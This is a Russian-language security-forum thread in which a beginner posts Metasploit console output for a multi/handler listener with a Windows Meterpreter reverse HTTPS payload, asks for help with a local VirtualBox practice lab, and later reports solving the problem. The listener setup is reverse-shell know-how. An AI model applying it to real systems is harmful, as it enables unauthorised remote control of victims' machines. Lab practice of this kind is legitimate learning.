HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.03.2018, 03:33
Dante Lui
Новичок
Регистрация: 24.03.2018
Сообщений: 2
С нами: 4285046

Репутация: 0
По умолчанию

root@kali:~# msfconsole

/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated

__________________________________________________ ____________________________

| |

| METASPLOIT CYBER MISSILE COMMAND V4 |

|_________________________________________________ _____________________________|

\ / /

\ . / / x

\ / /

\ / + /

\ + / /

* / /

/ . /

X / / X

/ ###

/ # % #

/ ###

. /

. / . * .

/

*

+ *

^

#### __ __ __ ####### __ __ __ ####

#### / \ / \ / \ ########### / \ / \ / \ ####

################################################## ##############################

################################################## ##############################

# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #

################################################## ##############################

https://metasploit.com

=[ metasploit v4.16.45-dev ]

+ -- --=[ 1744 exploits - 1000 auxiliary - 302 post ]

+ -- --=[ 529 payloads - 40 encoders - 10 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_https):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 10.0.2.15 yes The local listener hostname

LPORT 8080 yes The local listener port

LURI no The HTTP Path

Exploit target:

Id Name

-- ----

0 Wildcard Target

msf exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on https://10.0.2.15:8080

Отсутствует нижняя команда. Создал 2 машины (Кали, Виндоус10 -64) на Virtual box, настроил NatNetwork. Хотел для практики, локально настроиться на сеть - не выходит. Был бы рад за любую помощь, спасибо.
[*] Starting the payload handler...
 
Ответить с цитированием

  #2  
Старый 29.03.2018, 21:05
Dante Lui
Новичок
Регистрация: 24.03.2018
Сообщений: 2
С нами: 4285046

Репутация: 0
По умолчанию

Проблему решил. Ошибка оч простая, нужно было держать обе машины включенными) Затем команда - service apache2 start и во ля.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.